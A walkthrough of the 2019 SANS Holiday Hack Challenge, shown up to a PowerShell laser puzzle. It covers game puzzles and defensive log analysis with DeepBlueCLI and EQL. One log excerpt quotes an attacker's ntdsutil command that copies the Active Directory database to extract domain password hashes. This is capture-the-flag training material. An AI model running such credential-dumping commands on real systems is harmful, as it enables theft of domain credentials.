    • Visit Shinny Upatree in the Student Union and help solve their problem. What is written on the paper you retrieve for Shinny? For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.
  13. Filter Out Poisoned Sources of Weather Data

All right, now that we know all that - let’s get into answering the questions!

Objective 0

Talk to Santa in the Quad

Upon exiting the Train Station, we enter The Quad area of the university, where we spot Santa again! Upon talking to him we are presented with the following.

Simple enough, after talking with Santa we complete the very first objective.

Objective 1

Find the Turtle Doves

For this objective we are tasked with finding the missing turtle doves. Simply walking around the campus, and entering the Student Campus in the north, we find the two doves by the fireplace.

Clicking on them, we complete the next objective. This is too easy!

Objective 2

Unredact Threatening Document

For this objective, we need to figure out who sent a threatening letter to Elf University, and figure out what the first word in ALL CAPS is, in the subject line of the letter.

We have a hint within the objective that says we can find the letter in the Quad area. So, after walking around in the north-west part of the map we can find the letter!

Clicking on the letter to read it, we are presented with the following.

Darn, it seems this letter has some redacted confidential information which we would need to uncover to read. Well, let’s try the simplest thing we can, and that’s to copy the whole letter, and paste it into a new word document.

Upon doing so, we see that we easily bypass the redaction and are presented with the following text:

To the Administration, Faculty, and Staff of Elf University
17 Christmas Tree Lane
North Pole

From: A Concerned and Aggrieved Character

Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR
ELSE!


Attention All Elf University Personnel,

It remains a constant source of frustration that Elf University and the entire operation at the
North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE
you to consider lending your considerable resources and expertise in providing merriment,
cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical
characters.

For centuries, we have expressed our frustration at your lack of willingness to spread your
cheer beyond the inaptly-called β€œHoliday Season.” There are many other perfectly fine
holidays and mythical characters that need your direct support year-round.

If you do not accede to our demands, we will be forced to take matters into our own hands.
We do not make this threat lightly. You have less than six months to act demonstrably.

Sincerely,

--A Concerned and Aggrieved Character

After reading the document, we can navigate to our objective in our badge and enter the subject word β€œDEMAND” to complete the challenge.

Objective 3

Escape Ed - CranPi

If we return back to the train station, to the right of Santa we spot Bushy Evergreen!

Upon talking to Bushy, we learn that Pepper forced Bushy to learn how to use the ed text editor and has left Bushy stuck.

Upon accessing the terminal, we are presented with the following output:

                  ........................................
               .;oooooooooooool;,,,,,,,,:loooooooooooooll:
             .:oooooooooooooc;,,,,,,,,:ooooooooooooollooo:
           .';;;;;;;;;;;;;;,''''''''';;;;;;;;;;;;;,;ooooo:
         .''''''''''''''''''''''''''''''''''''''''';ooooo:
       ;oooooooooooool;''''''',:loooooooooooolc;',,;ooooo:
    .:oooooooooooooc;',,,,,,,:ooooooooooooolccoc,,,;ooooo:
  .cooooooooooooo:,''''''',:ooooooooooooolcloooc,,,;ooooo,
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;ooo,
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,,;l'
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc,,..
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooooc.
  coooooooooooooo,,,,,,,,,;ooooooooooooooloooo:.
  coooooooooooooo,,,,,,,,,;ooooooooooooooloo;
  :llllllllllllll,'''''''';llllllllllllllc,
Oh, many UNIX tools grow old, but this one's showing gray.
That Pepper LOLs and rolls her eyes, sends mocking looks my way.
I need to exit, run - get out! - and celebrate the yule.
Your challenge is to help this elf escape this blasted tool.
-Bushy Evergreen
Exit ed.
1110

Alright, so it seems for this terminal challenge we need to simply exit ed. If we google around for an answer we come across a website on how to exit certain editors.

So simply if we type in Q and press [ENTER] then we should be able to exit the editor.

Q
Loading, please wait......

You did it! Congratulations!

elf@428cacd2b42e:~$

Nice that was easy!

Windows Log Analysis: Evaluate Attack Outcome

Upon completing the Escape Ed terminal we can talk to Bushy again for more hints that will allow us to complete the next objective.

For this objective, we need to use the event log data to identify the user account that was compromised via a password spray attack.

Looking at the URL for the file download, I see that it has an evtx extension, which is for Windows Event Logging.

Since this is Windows, let’s download that file in a Windows VM, extract it, and validate the file format.

Awesome, so now that we have the file, we need to analyze the log data somehow. Bushy actually gave us a hint for Eric Conrad on DeepBlueCLI.

Upon accessing the GitHub repository for DeepBlueCLI we learn that is a PowerShell Module for Threat Hunting via Windows Event Logs, so that works great for us!

Let’s go ahead and download that repository to our Windows VM.

PS C:\Users\User\Desktop\Holiday Hack\Security.evtx\DeepBlueCLI\DeepBlueCLI-master> ls                                  

    Directory: C:\Users\User\Desktop\Holiday Hack\Security.evtx\DeepBlueCLI\DeepBlueCLI-master


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       12/22/2019   1:25 PM                evtx
d-----       12/22/2019   1:25 PM                hashes
d-----       12/22/2019   1:25 PM                READMEs
d-----       12/22/2019   1:25 PM                whitelists
-a----        7/24/2019   2:01 PM             15 .gitattributes
-a----        7/24/2019   2:01 PM          33848 DeepBlue.ps1
-a----        7/24/2019   2:01 PM           4827 DeepBlue.py
-a----        7/24/2019   2:01 PM           2781 DeepWhite-checker.ps1
-a----        7/24/2019   2:01 PM           1689 DeepWhite-collector.ps1
-a----        7/24/2019   2:01 PM          35141 LICENSE
-a----        7/24/2019   2:01 PM           5891 README.md
-a----        7/24/2019   2:01 PM           1673 regexes.txt
-a----        7/24/2019   2:01 PM            352 whitelist.txt

Once we have the tool installed we need to figure out how to utilize the tool to detected a password spraying attack.

Luckily for us, we if scroll through the DeepBlueCLI wiki, we come across an examples table, showing us what command we can run and what event it detects. There we spot the password spraying command we need.

So, let’s execute that command against our event log file, and after a few minutes we should see the following data:

PS C:\Users\User\Desktop\Holiday Hack\Security.evtx\DeepBlueCLI\DeepBlueCLI-master> .\DeepBlue.ps1 ..\..\Security.evtx

Date    : 11/19/2019 6:22:46 AM
Log     : Security
EventID : 4648
Message : Distributed Account Explicit Credential Use (Password Spray Attack)
Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password
          spray attack.
          Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns
          tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine wopenslae ltrufflefig supatree
          mstripysleigh pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff
          hcandysnaps mbrandybells twinterfig civypears ygreenpie ftinseltoes smary ttinselbubbles dsparkleleaves
          Accessing Username: -
          Accessing Host Name: -

Command :
Decoded :

Date    : 11/19/2019 6:22:40 AM
Log     : Security
EventID : 4648
Message : Distributed Account Explicit Credential Use (Password Spray Attack)
Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password
          spray attack.
          Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns
          tcandybaubles bbrandyleaves bevergreen lstripyleaves gchocolatewine ltrufflefig wopenslae mstripysleigh
          pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps
          mbrandybells twinterfig supatree civypears ygreenpie ftinseltoes smary ttinselbubbles dsparkleleaves
          Accessing Username: -
          Accessing Host Name: -

Command :
Decoded :

Date    : 11/19/2019 6:22:34 AM
Log     : Security
EventID : 4648
Message : Distributed Account Explicit Credential Use (Password Spray Attack)
Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password
          spray attack.
          Target Usernames: ygoldentrifle esparklesleigh Administrator sgreenbells cjinglebuns tcandybaubles
          bbrandyleaves bevergreen lstripyleaves gchocolatewine wopenslae ltrufflefig supatree mstripysleigh
          pbrandyberry civysparkles sscarletpie ftwinklestockings cstripyfluff gcandyfluff smullingfluff hcandysnaps
          mbrandybells twinterfig smary civypears ygreenpie ftinseltoes hevergreen ttinselbubbles dsparkleleaves
          Accessing Username: -
          Accessing Host Name: -
---snip---

We see a lot of 4648 Event ID’s which dictates that β€œA logon was attempted using explicit credentials”. If we scroll down a little lower, we see other logon events, but this time we see the 4672 Event ID. This event lets you know whenever an account assigned any β€œadministrator equivalent” user rights logs on.

Date    : 8/23/2019 7:00:20 PM
Log     : Security
EventID : 4672
Message : Multiple admin logons for one account
Results : Username: DC1$
          User SID Access Count: 12
Command :
Decoded :

Date    : 8/23/2019 7:00:20 PM
Log     : Security
EventID : 4672
Message : Multiple admin logons for one account
Results : Username: supatree
          User SID Access Count: 2
Command :
Decoded :

Date    : 8/23/2019 7:00:20 PM
Log     : Security
EventID : 4672
Message : High number of logon failures for one account
Results : Username: ygoldentrifle
          Total logon failures: 77
Command :
Decoded :

Between all the failure logins for the accounts that were being password sprayed only supatree was in the list of accounts that had multiple admin logins. So that was the compromised account.

So we enter supatree into our objective, to complete it.

Objective 4

Linux Path - CranPi

From the train station, we go into the Quad, and take a left into Hermey Hall where we will find SugarPlum Mary.

Talking to SugarPlum we figure out what the challenge consists of, and of course we also get a couple of hints to help in completing the CranPi challenge.

It seems that Mary has a problem with running ls which is used to list files… hmm. Upon accessing the terminal we see the following:

K000K000K000KK0KKKKKXKKKXKKKXKXXXXXNXXXX0kOKKKK0KXKKKKKKK0KKK0KK0KK0KK0KK0KK0KKKKKK
00K000KK0KKKKKKKKKXKKKXKKXXXXXXXXNXXNNXXooNOXKKXKKXKKKXKKKKKKKKKK0KKKKK0KK0KK0KKKKK
KKKKKKKKKKKXKKXXKXXXXXXXXXXXXXNXNNNNNNK0x:xoxOXXXKKXXKXXKKXKKKKKKKKKKKKKKKKKKKKKKKK
K000KK00KKKKKKKKXXKKXXXXNXXXNXXNNXNNNNNWk.ddkkXXXXXKKXKKXKKXKKXKKXKKXK0KK0KK0KKKKKK
00KKKKKKKKKXKKXXKXXXXXNXXXNXXNNNNNNNNWXXk,ldkOKKKXXXXKXKKXKKXKKXKKKKKKKKKK0KK0KK0XK
KKKXKKKXXKXXXXXNXXXNXXNNXNNNNNNNNNXkddk0No,;;:oKNK0OkOKXXKXKKXKKKKKKKKKKKKK0KK0KKKX
0KK0KKKKKXKKKXXKXNXXXNXXNNXNNNNXxl;o0NNNo,,,;;;;KWWWN0dlk0XXKKXKKXKKXKKKKKKKKKKKKKK
KKKKKKKKXKXXXKXXXXXNXXNNXNNNN0o;;lKNNXXl,,,,,,,,cNNNNNNKc;oOXKKXKKXKKXKKXKKKKKKKKKK
XKKKXKXXXXXXNXXNNXNNNNNNNNN0l;,cONNXNXc',,,,,,,,,KXXXXXNNl,;oKXKKXKKKKKK0KKKKK0KKKX
KKKKKKXKKXXKKXNXXNNXNNNNNXl;,:OKXXXNXc''',,''''',KKKKKKXXK,,;:OXKKXKKXKKX0KK0KK0KKK
KKKKKKKKXKXXXXXNNXXNNNNW0:;,dXXXXXNK:'''''''''''cKKKKKKKXX;,,,;0XKKXKKXKKXKKK0KK0KK
XXKXXXXXXXXXXNNNNNNNNNN0;;;ONXXXXNO,''''''''''''x0KKKKKKXK,',,,cXXKKKKKKKKXKKK0KKKX
KKKKKKKXKKXXXXNNNNWNNNN:;:KNNXXXXO,'.'..'.''..':O00KKKKKXd'',,,,KKXKKXKKKKKKKKKKKKK
KKKKKXKKXXXXXXXXNNXNNNx;cXNXXXXKk,'''.''.''''.,xO00KKKKKO,'',,,,KK0XKKXKKK0KKKKKKKK
XXXXXXXXXKXXXXXXXNNNNNo;0NXXXKKO,'''''''.'.'.;dkOO0KKKK0;.'',,,,XXXKKK0KK0KKKKKKKKX
XKKXXKXXXXXXXXXXXNNNNNcoNNXXKKO,''''.'......:dxkOOO000k,..''',,lNXKXKKXKKK0KKKXKKKK
KXXKKXXXKXXKXXXXXXXNNNoONNXXX0;'''''''''..'lkkkkkkxxxd'...'''',0N0KKKKKXKKKKKK0XKKK
XXXXXKKXXKXXXXXXXXXXXXOONNNXXl,,;;,;;;;;;;d0K00Okddoc,,,,,,,,,xNNOXKKKKKXKKKKKKKXKK
XXXXXXXXXXXXXXXXXXXXXXXONNNXx;;;;;;;;;,,:xO0KK0Oxdoc,,,,,,,,,oNN0KXXKKXKKXKKKKKKKXK
XKXXKXXXXXXXXXXXXXXXXXXXXWNX:;;;;;;;;;,cO0KKKK0Okxl,,,,,,,,,oNNK0NXXXXXXXXXKKKKKKKX
XXXXXXXXXXXXXXXXXXXXXXXNNNWNc;;:;;;;;;xKXXXXXXKK0x,,,,,,,,,dXNK0NXXXXXXXXXXXKKXKKKK
XKXXXXXXXXXXXXXXXXXXXXNNWWNWd;:::;;;:0NNNNNNNNNXO;,,,,,,,:0NN0XNXNXXXXXXXXXXXKKXKKX
NXXXXXXXXXXXXXXXXXXXXXNNNNNNNl:::;;:KNNNNNNNNNNO;,,,,,,;xNNK0NXNXXNXXXXXXKXXKKKKXKK
XXNNXNNNXXXXXXXXXXXXXNNNNNNNNNkl:;;xWWNNNNNWWWk;;;;;;;xNNKKXNXNXXNXXXXXXXXXXXKXKKXK
XXXXXNNNNXNNNNXXXXXXNNNNNNNNNNNNKkolKNNNNNNNNx;;;;;lkNNXNNNNXXXNXXNXXXXXXXXXXXKKKKX
XXXXXXXXXXXNNNNNNNNNNNNNNNNNNNNNNNNNKXNNNNWNo:clxOXNNNNNNNNXNXXXXXXXXXXXXXXXKKXKKKK
XXXXNXXXNXXXNXXNNNNNWWWWWNNNNNNNNNNNNNNNNNWWNWWNWNNWNNNNNNNNXXXXXXNXXXXXXXXXXKKXKKX
XNXXXXNNXXNXXNNXNXNWWWWWWWWWNNNNNNNNNNNNNWWWWNNNNNNNNNNNNNNNNNNNNNXNXXXXNXXXXXXKXKK
XXXXNXXNNXXXNXXNXXNWWWNNNNNNNNNWWNNNNNNNNWWWWWWNWNNNNNNNNNNNNNNNXXNXNXXXXNXXXXKXKXK

I need to list files in my home/
To check on project logos
But what I see with ls there,
Are quotes from desert hobos...

which piece of my command does fail?
I surely cannot find it.
Make straight my path and locate that-
I'll praise your skill and sharp wit!

Get a listing (ls) of your current directory.
elf@5309d6e61bc9:~$

Alright so the challenge seems pretty simple, we need to get a listing of the current directory by using the ls command. Let’s see what happens we do try to execute ls.

elf@5309d6e61bc9:~$ ls  
This isn't the ls you're looking for

Alright, well that seems to be executing another binary. If you remember back to the questions Mary asked, in #3 she asked β€œWhat happens if there are multiple executable with the same name in the $PATH?”.

For those unaware what a unix path is, a PATH is an environmental variable that Linux and other Unix-like operating systems use to tell the shell which directories to search for executable files in response to commands issued by the user.

A users PATH consists of a series of colon-separated absolute paths that are stored in plain text files. Whenever a user types in a command at the command line that is not built into the shell or that does not include its absolute path, and then presses the Enter key, the shell searches through those directories. The shell will continue to look though all these paths until it finds an executable file with the same name as the command execute.

So knowing that, let’s echo then $PATH environmental variables to see our search path.

elf@5309d6e61bc9:~$ echo $PATH  
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Okay, that seems pretty normal to me. Let’s try to find out where the ls binary is actually stored. We can do this by using the whereis command.

elf@5309d6e61bc9:~$ whereis ls  
ls: /bin/ls /usr/local/bin/ls /usr/share/man/man1/ls.1.gz

Right, so we can see that there are two (2) ls binaries, one in /bin/ls and one in /usr/local/bin/ls. Let’s execute each relative path to find the right one.

elf@5309d6e61bc9:~$ /usr/local/bin/ls  
This isn't the ls you're looking for  
elf@5309d6e61bc9:~$ /bin/ls  
' '  rejected-elfu-logos.txt  
Loading, please wait......

You did it! Congratulations!

Alright awesome, we found that the /bin/ls binary is the proper one. So I know that we completed the challenge, but let’s go ahead and fix our $PATH variable so it uses the right binary, and finally we can cat that rejected logo ;).

elf@5309d6e61bc9:~$ export PATH="/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/game"
elf@5309d6e61bc9:~$ ls
' '   rejected-elfu-logos.txt
elf@5309d6e61bc9:~$ cat rejected-elfu-logos.txt 
        _        
       / \
       \_/
       / \
      /   \
     /    |
    /     |
   /       \
 _/_________|_
 (____________)
Get Elfed at ElfU!
()
  |\__/------\
  \__________/
  Walk a Mile in an elf's shoes
  Take a course at ElfU!
____\()/____
  |    ||    |
  |    ||    |
  |====||====|
  |    ||    |
  |    ||    |
  ------------
Be present in class

And there we have it, we completed the terminal challenge!

Windows Log Analysis: Determine Attacker Technique

Upon successfully completing the Linux Path terminal, we can talk to SugarPlum Mary again for more hints that will allow us to complete the next objective.

For this objective, we need to identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process, by using these normalized Sysmon logs.

Upon downloading the Sysmon logs, we can see that all this data is in a JSON file format.

root@kali:~/HH/sysmon-data# ls -la sysmon-data.json
-rwx------ 1 root root 1886009 Dec  5 15:41 sysmon-data.json

So we need to find the tool that was used to dump the passwords, but we’re not really sure how we can parse the Sysmon JSON logs in linux. If we look back to the hints provided by SugarPlum Mary, we get hints on Sysmon By Carlos Perez, EQL Threat Hunting, as well as a hint to check out some of Ross Wolf’s work on EQL.

After some reading we learn about the EQL Tool released by EndGame. The Event Query Language (EQL) is a standardized query language (similar to SQL) to evaluate Windows events. The tools main purpose is to normalize Windows log events for consistent access and querying.

Cool, so reading information from the GitHub repository, let’s go ahead and install EQL.

root@kali:~/HH/sysmon-data# pip3 install eql

Now that we have the tool installed, we need to figure out how to use it. After reading the EQL Threat Hunting post, we come across a great example of the usage.

We are also provided an example command for how to look for regserv32.exe with EQL.

slingshot $ eql query -f querydata.json "process where process_name = 'regsvr32.exe'"

By using the EQL Query Guide and using all the previously listed materials, we learn how to import our JSON data into EQL, and also learn how to search for specific schema’s and the data they contain.

With this, let’s load our data, and see what we can search for inside the process schema.

root@kali:~/HH/sysmon-data# eql
===================
     EQL SHELL     
===================
type help to view more commands
eql> input sysmon-data.json
Using file sysmon-data.json with 2626 events
eql> schema process           
---snip---
 'process': {'command_line': 'string',
             'event_type': 'string',
             'logon_id': 'number',
             'parent_process_name': 'string',
             'parent_process_path': 'string',
             'pid': 'number',
             'ppid': 'number',
             'process_name': 'string',
             'process_path': 'string',
             'subtype': 'string',
             'timestamp': 'number',
             'unique_pid': 'string',
             'unique_ppid': 'string',
             'user': 'string',
             'user_domain': 'string',
             'user_name': 'string'},
---snip---

Alright, so we know what type of information we can search for relating to process data. Since we know that the LSASS process was dumped via the lsass.exe executable, let’s search for that specific name in the command_line as the attacker could have used ProcDump.

root@kali:~/HH/sysmon-data# eql query -f sysmon-data.json "process where command_line == '*lsass.exe*'"

Hmm.. no data was returned. Maybe attacker used something else? It’s highly possible, that an attacker had privileged access to a Windows Domain Controller and used ntdsutil to create an accessible backup of the domains password hashes. So let’s see if that was true!

root@kali:~/HH/sysmon-data# eql query -f sysmon-data.json "process where command_line == '*ntds*'" | jq
{
  "command_line": "ntdsutil.exe  \"ac i ntds\" ifm \"create full c:\\hive\" q q",
  "event_type": "process",
  "logon_id": 999,
  "parent_process_name": "cmd.exe",
  "parent_process_path": "C:\\Windows\\System32\\cmd.exe",
  "pid": 3556,
  "ppid": 3440,
  "process_name": "ntdsutil.exe",
  "process_path": "C:\\Windows\\System32\\ntdsutil.exe",
  "subtype": "create",
  "timestamp": 132186398470300000,
  "unique_pid": "{7431d376-dee7-5dd3-0000-0010f0c44f00}",
  "unique_ppid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
  "user": "NT AUTHORITY\\SYSTEM",
  "user_domain": "NT AUTHORITY",
  "user_name": "SYSTEM"
}

And there we have it, ntdsutil was actually used!

From here, we can navigate to the fourth objective in our badge and enter β€œntdsutil” to complete the objective.

Objective 5

Xmas Cheer Laser - CranPi

From SugarPlum Mary in Hermy Hall, we go left and enter the Laboratory. There we will meet Sparkle Redberry!

Upon talking with Sparkle, we learn that she is having an issue with her laser - which seems to consist of settings in PowerShell.

Upon accessing the terminal we are presented with the following:

WARNGING: ctrl + c restricted in this terminal - Do not use endless loops
Type exit to exit PowerShell.
PowerShell 6.2.3
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²
πŸ—²                                                                                πŸ—²
πŸ—² Elf University Student Research Terminal - Christmas Cheer Laser Project       πŸ—²
πŸ—² ------------------------------------------------------------------------------ πŸ—²
πŸ—² The research department at Elf University is currently working on a top-secret πŸ—²
πŸ—² Laser which shoots laser beams of Christmas cheer at a range of hundreds of    πŸ—²
πŸ—² miles. The student research team was successfully able to tweak the laser to   πŸ—²
πŸ—² JUST the right settings to achieve 5 Mega-Jollies per liter of laser output.   πŸ—²
πŸ—² Unfortunately, someone broke into the research terminal, changed the laser     πŸ—²
πŸ—² settings through the Web API and left a note behind at /home/callingcard.txt.  πŸ—²
πŸ—² Read the calling card and follow the clues to find the correct laser Settings. πŸ—²
πŸ—² Apply these correct settings to the laser using it's Web API to achieve laser  πŸ—²
πŸ—² output of 5 Mega-Jollies per liter.                                            πŸ—²
πŸ—²                                                                                πŸ—²
πŸ—² Use (Invoke-WebRequest -Uri http://localhost:1225/).RawContent for more info.  πŸ—²
πŸ—²                                                                                πŸ—²
πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²πŸ—²

After reading the information in the terminal we learn that we need to recalibrate the laser and tweak the settings to achieve 5 Mega-Jollies per liter of laser output. We also initially learn that someone left a note behind at /home/callingcard.txt with information on what they might have done to mess with the laser.

We also learn that by executing (Invoke-WebRequest -Uri http://localhost:1225/).RawContent we can see the settings and access the Web API to tune the laser… so let’s do just that!

PS /home/elf> (Invoke-WebRequest -Uri http://localhost:1225/).RawContent
HTTP/1.0 200 OK                                                                                   
Server: Werkzeug/0.16.0                                                                           
Server: Python/3.6.9                                                                              
Date: Sat, 14 Dec 2019 23:43:06 GMT                                                               
Content-Type: text/html; charset=utf-8
Content-Length: 860
<html>
<body>
<pre>
----------------------------------------------------
Christmas Cheer Laser Project Web API
----------------------------------------------------
Turn the laser on/off:
GET http://localhost:1225/api/on
GET http://localhost:1225/api/off
Check the current Mega-Jollies of laser output
GET http://localhost:1225/api/output
Change the lense refraction value (1.0 - 2.0):
GET http://localhost:1225/api/refraction?val=1.0
Change laser temperature in degrees Celsius:
GET http://localhost:1225/api/temperature?val=-10
Change the mirror angle value (0 - 359):
GET http://localhost:1225/api/angle?val=45.1
Change gaseous elements mixture:
POST http://localhost:1225/api/gas
POST BODY EXAMPLE (gas mixture percentages):
O=5&H=5&He=5&N=5&Ne=20&Ar=10&Xe=10&F=20&Kr=10&Rn=10
----------------------------------------------------
</pre>
</body>
</html>

Alright, awesome! So we can see all the API endpoints that we can use to tune the laser and see the current power level. Let’s check the current laser output by calling the /api/output endpoint.

PS /home/elf> (Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent
HTTP/1.0 200 OK                                                                                   
Server: Werkzeug/0.16.0                                                                           
Server: Python/3.6.9                                                                              
Date: Sat, 14 Dec 2019 23:44:26 GMT                                                               
Content-Type: text/html; charset=utf-8
Content-Length: 58
Failure - Only 3.36 Mega-Jollies of Laser Output Reached!

Hmm… so we only have 3.36 Mega-Jollies of laser output. Let’s read that callingcard.txt file and see if it won’t help us in fixing this mess!

PS /home/elf> type /home/callingcard.txt  
What's become of your dear laser?  
Fa la la la la, la la la la  
Seems you can't now seem to raise her!  
Fa la la la la, la la la la  
Could commands hold riddles in hist'ry?  
Fa la la la la, la la la la  
Nay! You'll ever suffer myst'ry!  
Fa la la la la, la la la la

Well fa la la la la, what the heck did the attacker do to the laser? It seems that he’s leaving us clues by using riddles. Initially the one thing that stands out to me is the following line - β€œCould commands hold riddles in hist’ry?”

Commands in history? Well since this is PowerShell, we can actually see what commands were previously executed, just like in Linux. If you’re not familiar with PowerShell, Sparkle gave us a hint to read the SANS’ PowerShell Cheat Sheet which should help us out a bit.

In PowerShell, we can use the Get-History command to see previous command input.

PS /home/elf> Get-History
Id CommandLine
  -- -----------
   1 Get-Help -Name Get-Process 
   2 Get-Help -Name Get-* 
   3 Set-ExecutionPolicy Unrestricted 
   4 Get-Service | ConvertTo-HTML -Property Name, Status > C:\services.htm 
   5 Get-Service | Export-CSV c:\service.csv 
   6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv 
   7 (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
   8 Get-EventLog -Log "Application" 
   9 I have many name=value variables that I share to applications system wide. At a command I w…
  10 type /home/callingcard.txt

Nice, so we got a list of the command history! Right away, in #7 we can see that an API call was made to change the angle of the laser - (Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent. So let’s save that command for later user.

Also, in #9 we see a continuation of the riddle… but it’s cut off. So what we can do is select that specific history ID, and then use the Format-List function to format the list/long line of text for better readability. We can also use fl as a short hand for Format-List, as seen below.

PS /home/elf> Get-History -Id 9 | fl

Id                 : 9
CommandLine        : I have many name=value variables that I share to applications system wide. 
                     At a command I will reveal my secrets once you Get my Child Items.
ExecutionStatus    : Completed
StartExecutionTime : 11/29/19 4:57:16 PM
EndExecutionTime   : 11/29/19 4:57:16 PM
Duration           : 00:00:00.6090308

So the next riddle states that there are many name=value variables which are shared system wide, and that we need to Get Child Items. Well for the child items, I know that we will need to use the Get-ChildItem function from powershell, but against what?

Well if we think about name=value parameters that are shared system wide, then I’m directly thinking of environmental variables. By looking into the powershell environmental variables manual, we see that the variables can be listed by using Env:.

So let’s go ahead and use the Get-ChildItem command against that to see what we can discover.

PS /home/elf> Get-ChildItem -Path Env:

Name                           Value
----                           -----
_                              /bin/su
DOTNET_SYSTEM_GLOBALIZATION_I… false
HOME                           /home/elf
HOSTNAME                       48a2ebd93d8b
LANG                           en_US.UTF-8
LC_ALL                         en_US.UTF-8
LOGNAME                        elf
MAIL                           /var/mail/elf
PATH                           /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bin:/usr/s…
PSModuleAnalysisCachePath      /var/cache/microsoft/powershell/PSModuleAnalysisCache/ModuleAnaly…
PSModulePath                   /home/elf/.local/share/powershell/Modules:/usr/local/share/powers…
PWD                            /home/elf
RESOURCE_ID                    c658a4f4-8104-4d61-a3d5-bc3109ae9ff1
riddle                         Squeezed and compressed I am hidden away. Expand me from my priso…
SHELL                          /home/elf/elf
SHLVL                          1
TERM                           xterm
USER                           elf
USERDOMAIN                     laserterminal
userdomain                     laserterminal
USERNAME                       elf
username                       elf

Right away we see we have a riddle variable with a value! Unfortunately for us… it’s cut off. So let’s go ahead and grab the values of each key, and format that for readability.

PS /home/elf> Get-ChildItem -Path Env: | select Value | fl 
Value : /bin/su
Value : false
Value : /home/elf
Value : 2f466e986a7f
Value : en_US.UTF-8
Value : en_US.UTF-8
Value : elf
Value : /var/mail/elf
Value : /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:
        /usr/games:/usr/local/games
Value : /var/cache/microsoft/powershell/PSModuleAnalysisCache/ModuleAnalysisCache
Value : /home/elf/.local/share/powershell/Modules:/usr/local/share/powershell/Modules:/opt/micros
        oft/powershell/6/Modules
Value : /home/elf
Value : 8ec19745-0332-4a36-95e2-a185d3db17a0
Value : Squeezed and compressed I am hidden away. Expand me from my prison and I will show you 
        the way. Recurse through all /etc and Sort on my LastWriteTime to reveal im the newest 
        of all.
Value : /home/elf/elf
Value : 1
Value : xterm
Value : elf
Value : laserterminal
Value : laserterminal
Value : elf
Value : elf

Nice, now we can read the riddle! The initial line of squeezed and compressed makes me think that we will be looking at some sort of archive or zip file. We learn that this is hidden away and we need to recurse through /etc/ and sort by LastWriteTime to show the newest object first, which means that we need to sort descending.

Let’s do just that, but since there might be a lot of data, we can use the Select-Object function to select the top 10 results as follows.

PS /home/elf> Get-ChildItem -Path /etc/ -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -first 10

    Directory: /etc/apt

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---           1/12/20 12:32 AM        5662902 archive

    Directory: /etc

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
--r---           1/12/20 12:32 AM             13 hostname
--r---           1/12/20 12:32 AM            113 resolv.conf
--r---           1/12/20 12:32 AM            175 hosts
-----l           1/12/20 12:32 AM             12 mtab
--r---          12/13/19  5:16 PM            581 group
------          12/13/19  5:16 PM            482 gshadow
--r---          12/13/19  5:16 PM            575 group-
------          12/13/19  5:16 PM            476 gshadow-

    Directory: /etc/systemd/system

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---          12/13/19  5:15 PM                timers.target.wants

We can see that the first object is in /etc/apt/archive, so let’s go ahead and use the Expand-Archive command to uncompress the archive and then let’s view the files within it.

PS /home/elf> Expand-Archive -LiteralPath /etc/apt/archive  
PS /home/elf> dir  
Directory: /home/elf  
  
Mode  LastWriteTime  Length Name  
----  -------------  ------ ----  
d-----  12/15/19 12:51 AM  archive  
d-r---  12/13/19  5:15 PM  depths  
--r---  12/13/19  4:29 PM  2029 motd

PS /home/elf> Get-ChildItem ./archive/ -Recurse


    Directory: /home/elf/archive

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----           1/12/20 12:50 AM                refraction

    Directory: /home/elf/archive/refraction

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
------           11/7/19 11:57 AM            134 riddle
------           11/5/19  2:26 PM        5724384 runme.elf

Right away we see we have two files in the refraction folder within the archive. First is the riddle, and then there is a runme.elf file, which I’m guessing we need to run.

Unfortunately, we can’t just call the file directly to execute it like we do in linux because we will get an error like so:

PS /home/elf> cd ./archive/refraction/
PS /home/elf/archive/refraction> ./runme.elf
Program 'runme.elf' failed to run: No such file or directoryAt line:1 char:1
